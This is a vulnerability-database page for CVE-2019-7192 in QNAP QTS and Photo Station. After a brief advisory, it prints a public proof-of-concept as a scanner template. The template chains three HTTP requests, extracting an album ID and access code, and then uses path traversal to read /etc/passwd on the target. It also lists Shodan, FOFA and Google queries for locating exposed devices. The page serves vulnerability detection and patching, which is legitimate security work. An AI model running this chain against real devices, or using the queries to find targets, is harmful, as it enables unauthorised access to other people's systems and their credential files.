CVE-2019-7192: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

Date: 2025-08-01 | Affected software: QNAP QTS and Photo Station 6.0.3 | PoC: public

Vulnerability description

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix this vulnerability, QNAP recommends updating Photo Station to the latest version.

PoC code [public]

id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix this vulnerability, QNAP recommends updating Photo Station to the latest version.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
    epss-score: 0.94071
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qnap
    product: photo_station
    shodan-query:
      - 'Content-Length: 580 "http server 1.0"'
      - http.title:"photo station"
      - http.title:"qnap"
      - 'content-length: 580 "http server 1.0"'
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"qnap"
      - intitle:"photo station"
  tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum
      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 490a00463044022054fd30d65679d5d8944e16cbb8887caf3e1cab9ca5891c80d82dbd3699d41be3022064ebf4d58f5fc17e7e440663eda9c529c529faaf96fb963e81a19dda907fb78d:922c64590222798bb761d5b6d8e72950